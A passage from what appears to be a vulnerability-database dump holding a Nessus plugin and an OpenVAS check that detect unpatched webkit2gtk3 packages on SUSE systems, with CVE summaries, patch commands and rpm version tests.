issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7056: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7064: An issue was fixed that allowed remote\n attackers to bypass intended memory-read restrictions\n via a crafted app (bsc#1050469).\n\n - CVE-2017-7061: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7048: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-7046: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1050469).\n\n - CVE-2017-2538: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1045460)\n\n - CVE-2017-2496: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website.\n\n - CVE-2017-2539: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website.\n\n - CVE-2017-2510: An issue was fixed that allowed remote\n attackers to conduct Universal XSS (UXSS) attacks via a\n crafted website that improperly interacts with pageshow\n events.\n\n - CVE-2017-2365: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2366: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2373: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2363: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2362: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2350: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2350: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2354: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749).\n\n - CVE-2017-2355: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (uninitialized memory access and application\n crash) via a crafted website (bsc#1024749)\n\n - CVE-2017-2356: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2017-2371: An issue was fixed that allowed remote\n attackers to launch popups via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2364: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website\n (bsc#1024749)\n\n - CVE-2017-2369: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1024749)\n\n - CVE-2016-7656: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7635: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7654: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7639: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7645: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7652: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7641: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7632: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7599: An issue was fixed that allowed remote\n attackers to bypass the Same Origin Policy and obtain\n sensitive information via a crafted website that used\n HTTP redirects (bsc#1020950)\n\n - CVE-2016-7592: An issue was fixed that allowed remote\n attackers to obtain sensitive information via crafted\n JavaScript prompts on a web site (bsc#1020950)\n\n - CVE-2016-7589: An issue was fixed that allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1020950)\n\n - CVE-2016-7623: An issue was fixed that allowed remote\n attackers to obtain sensitive information via a blob URL\n on a website (bsc#1020950)\n\n - CVE-2016-7586: An issue was fixed that allowed remote\n attackers to obtain sensitive information via a crafted\n website (bsc#1020950) For other non-security fixes\n please check the changelog.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020950\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1024749\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045460\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050469\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7586/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7589/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7592/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7599/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7623/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7632/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7635/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7639/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7641/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7645/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7652/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7654/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7656/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2350/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2354/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2355/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2356/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2362/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2363/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2364/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2365/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2366/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2369/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2371/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2373/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2496/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2510/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2538/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-2539/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7018/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7030/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7034/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7037/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7039/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7046/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7048/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7055/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7056/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7061/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7064/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172933-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8f9052a2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2017-1815=1\n\nSUSE Linux Enterprise Workstation Extension 12-SP2:zypper in -t patch\nSUSE-SLE-WE-12-SP2-2017-1815=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-1815=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1815=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-1815=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2017-1815=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-1815=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2017-1815=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-1815=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2/3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-WebKit2-4_0-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk3-debugsource-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-WebKit2-4_0-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk3-debugsource-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.18.0-2.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.18.0-2.9.1\")) flag++;\n\n\nif (flag)\n{\n set_kb_item(name:'www/0/XSS', value:TRUE);\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-01-31T16:47:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-02-01T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:0108-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4438", "CVE-2018-4464", "CVE-2018-4441"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852266", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852266", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852266\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-02-01 04:03:21 +0100 (Fri, 01 Feb 2019)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:0108-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0108-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-01/msg00050.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2019:0108-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.22.5 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-4438: Fixed a logic issue which lead to memory corruption\n (bsc#1119554)\n\n - CVE-2018-4437, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443,\n CVE-2018-4464: Fixed multiple memory corruption issues with improved\n memory handling (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557,\n bsc#1119558)\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-108=1\");\n\n script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser\", rpm:\"webkit2gtk3-minibrowser~2.22.5~18.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser-debuginfo\", rpm:\"webkit2gtk3-minibrowser-debuginfo~2.22.5~18.1\", 